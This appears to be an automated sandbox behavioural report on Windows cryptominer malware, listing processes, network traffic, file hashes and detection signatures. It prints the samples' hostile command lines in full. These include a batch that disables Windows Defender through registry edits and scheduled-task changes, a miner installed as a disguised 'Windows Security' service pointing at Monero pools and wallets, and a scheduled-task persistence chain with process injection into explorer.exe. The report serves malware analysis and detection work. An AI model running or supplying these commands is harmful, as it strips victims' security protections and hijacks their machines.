"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DF.tmp\2E0.tmp\2E1.bat C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Perform\7za.exe
7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU
C:\Perform\update.exe
C:\Perform\update.exe
C:\Perform\Resources\NSudo.exe
C:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.7
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\nssm.exe
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\7za.exe
C:\Perform\nssm.exe
nssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint= 70 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmr.crypto-pool.fr:8888 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\Defender.exe
C:\Perform\nssm.exe
nssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6e34f50,0x7fef6e34f60,0x7fef6e34f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=944,3555585727298338653,5852393778132322891,131072 --headless --headless --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=952 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=944,3555585727298338653,5852393778132322891,131072 --lang=en-US --service-sandbox-type=network --use-gl=swiftshader-webgl --mute-audio --headless --mojo-platform-channel-handle=1120 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=944,3555585727298338653,5852393778132322891,131072 --disable-databases --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1292 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | palygamesconsutoria.blogspot.com | udp |
| NL | 172.217.168.225:443 | palygamesconsutoria.blogspot.com | tcp |
| US | 8.8.8.8:53 | resources.blogblog.com | udp |
| US | 8.8.8.8:53 | www.blogger.com | udp |
| NL | 172.217.168.225:443 | palygamesconsutoria.blogspot.com | udp |
| NL | 172.217.168.233:443 | www.blogger.com | tcp |
| NL | 172.217.168.233:443 | www.blogger.com | tcp |
| US | 8.8.8.8:53 | themes.googleusercontent.com | udp |
| NL | 142.251.39.97:443 | themes.googleusercontent.com | tcp |
| NL | 172.217.168.233:443 | www.blogger.com | udp |
Files
memory/1808-54-0x0000000076171000-0x0000000076173000-memory.dmp
memory/1736-55-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2DF.tmp\2E0.tmp\2E1.bat
| MD5 | 55f5a5033d59e83f200f78efd8cf9ffd |
| SHA1 | b153b8f0da50ffc56996bafa0be0610cec8b9d99 |
| SHA256 | d7c9417cd55995d45e20bcb9ac046b0f04cf06486d12d689f515af9eaa097041 |
| SHA512 | 9924e373453ad7b415aa6b505c7ad232294f44d68a3d7f8d68414bfacab11fc4678b4a03ed5d172b7f0eab9ef905a9e16e2d42b58ba62d11d1d1697760faf047 |
memory/1780-57-0x0000000000000000-mapping.dmp
memory/1420-58-0x0000000000000000-mapping.dmp
memory/1296-59-0x0000000000000000-mapping.dmp
memory/1212-60-0x0000000000000000-mapping.dmp
memory/1768-61-0x0000000000000000-mapping.dmp
memory/1284-62-0x0000000000000000-mapping.dmp
memory/2008-63-0x0000000000000000-mapping.dmp
memory/1408-64-0x0000000000000000-mapping.dmp
memory/1980-65-0x0000000000000000-mapping.dmp
memory/896-66-0x0000000000000000-mapping.dmp
memory/572-67-0x0000000000000000-mapping.dmp
memory/660-68-0x0000000000000000-mapping.dmp
memory/1540-69-0x0000000000000000-mapping.dmp
memory/1944-70-0x0000000000000000-mapping.dmp
memory/904-71-0x0000000000000000-mapping.dmp
memory/600-72-0x0000000000000000-mapping.dmp
memory/672-73-0x0000000000000000-mapping.dmp
memory/1704-74-0x0000000000000000-mapping.dmp
memory/1012-75-0x0000000000000000-mapping.dmp
memory/876-76-0x0000000000000000-mapping.dmp
memory/1836-77-0x0000000000000000-mapping.dmp
memory/1380-78-0x0000000000000000-mapping.dmp
memory/1972-79-0x0000000000000000-mapping.dmp
memory/1208-80-0x0000000000000000-mapping.dmp
memory/1724-81-0x0000000000000000-mapping.dmp
memory/1180-82-0x0000000000000000-mapping.dmp
memory/1848-83-0x0000000000000000-mapping.dmp
memory/1524-84-0x0000000000000000-mapping.dmp
memory/1652-85-0x0000000000000000-mapping.dmp
memory/744-86-0x0000000000000000-mapping.dmp
memory/1152-87-0x0000000000000000-mapping.dmp
memory/1556-88-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\files.7z
| MD5 | 6380cb936d9229799750c4416ad99a81 |
| SHA1 | d1efa33ab91b12e336190774e616f5e420979201 |
| SHA256 | f3ac47452bc79d0f0b1dbdc73d12f76bc54b2e0452ca5e5ad9a06ed6b77cc7ce |
| SHA512 | 3139a611f3cb143b96ab32c0492b91f457b9f29bc3b4f9fa807b89fe4ea874fb004de6f7d5816c0dd1b25bb44ed5fafbd74298152c579d5a68c04d0815675970 |
C:\Users\Admin\AppData\Local\Temp\7za.exe
| MD5 | 0184e6ebe133ef41a8cc6ef98a263712 |
| SHA1 | cb9f603e061aef833a2db501aa8ba6ba007d768e |
| SHA256 | dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 |
| SHA512 | 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed |
memory/1800-91-0x0000000000000000-mapping.dmp
C:\Perform\7za.exe
| MD5 | 0184e6ebe133ef41a8cc6ef98a263712 |
| SHA1 | cb9f603e061aef833a2db501aa8ba6ba007d768e |
| SHA256 | dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 |
| SHA512 | 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed |
\Perform\update.exe
| MD5 | 0e4afc55e03f8fe26d82e054004c16a3 |
| SHA1 | e5560a6d10d11e84eb094561ae1ec1c4461dd2c7 |
| SHA256 | d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e |
| SHA512 | 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f |
memory/1272-94-0x0000000000000000-mapping.dmp
C:\Perform\update.exe
| MD5 | 0e4afc55e03f8fe26d82e054004c16a3 |
| SHA1 | e5560a6d10d11e84eb094561ae1ec1c4461dd2c7 |
| SHA256 | d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e |
| SHA512 | 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f |
memory/1272-96-0x000007FEFC281000-0x000007FEFC283000-memory.dmp
C:\Perform\update.exe
| MD5 | 0e4afc55e03f8fe26d82e054004c16a3 |
| SHA1 | e5560a6d10d11e84eb094561ae1ec1c4461dd2c7 |
| SHA256 | d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e |
| SHA512 | 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f |
\Perform\Resources\NSudo.exe
| MD5 | 5cae01aea8ed390ce9bec17b6c1237e4 |
| SHA1 | 3a80a49efaac5d839400e4fb8f803243fb39a513 |
| SHA256 | 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618 |
| SHA512 | c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481 |
C:\Perform\Resources\NSudo.exe
| MD5 | 5cae01aea8ed390ce9bec17b6c1237e4 |
| SHA1 | 3a80a49efaac5d839400e4fb8f803243fb39a513 |
| SHA256 | 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618 |
| SHA512 | c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481 |
memory/360-104-0x0000000000000000-mapping.dmp
C:\Perform\up.vbs
| MD5 | 9fc9cd6fff29c03e2b164cafe21543a1 |
| SHA1 | c348cd40f9e112413a2587ef3036628a056aee13 |
| SHA256 | b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1 |
| SHA512 | 1362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b |
memory/612-115-0x0000000000000000-mapping.dmp
\Perform\Resources\NSudo.exe
| MD5 | 5cae01aea8ed390ce9bec17b6c1237e4 |
| SHA1 | 3a80a49efaac5d839400e4fb8f803243fb39a513 |
| SHA256 | 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618 |
| SHA512 | c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481 |
memory/1420-118-0x0000000000000000-mapping.dmp
memory/1004-123-0x0000000000000000-mapping.dmp
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
C:\Perform\Defender.exe
| MD5 | 33dcb753b2236649ae2f13d898e8eb5d |
| SHA1 | f9be1a9b50b55d9244e20c8ea79ad276854f461c |
| SHA256 | f4bb913e4a58f671d74d242d7003fe7d5cdcbe3116fca720836751fb754e4160 |
| SHA512 | 7a3462d1b0a91a19a1b0de43a6a1115e6e161175726ec6f56e83293c75e773f652c376393c0d407ed3ebcaaeb6a363a1625dc780647d84586f1f8eea0aa0a731 |
memory/1768-121-0x0000000000000000-mapping.dmp
memory/1980-125-0x0000000000000000-mapping.dmp
memory/772-127-0x0000000000000000-mapping.dmp
memory/1324-129-0x0000000000000000-mapping.dmp
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
memory/768-131-0x0000000000000000-mapping.dmp
\??\pipe\crashpad_684_OOORIFOLVJJRYXLR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral7
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
150s
Max time network
45s
Command Line
Signatures
Eternity
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 892 set thread context of 796 | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping 127.0.0.1
C:\Windows\system32\schtasks.exe
schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_ZERMMMDR -p x --max-cpu-usage=30 --donate-level=1
C:\Windows\system32\taskeng.exe
taskeng.exe {2693B212-B803-40D3-B586-7AEEA702C530} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
Files
memory/1976-54-0x000000013FE60000-0x0000000140076000-memory.dmp
memory/1976-55-0x000007FEFC511000-0x000007FEFC513000-memory.dmp
memory/1516-57-0x0000000000000000-mapping.dmp
memory/1728-56-0x0000000000000000-mapping.dmp
memory/1740-58-0x0000000000000000-mapping.dmp
memory/944-59-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
memory/892-61-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
memory/892-64-0x000000013F930000-0x000000013FB46000-memory.dmp
memory/796-65-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-66-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-68-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-70-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-72-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-74-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-75-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-76-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-78-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-80-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-82-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-81-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-84-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-85-0x00000001402EB66C-mapping.dmp
memory/796-87-0x0000000140000000-0x0000000140758000-memory.dmp
memory/796-88-0x0000000000070000-0x0000000000090000-memory.dmp
memory/796-89-0x0000000140000000-0x0000000140758000-memory.dmp
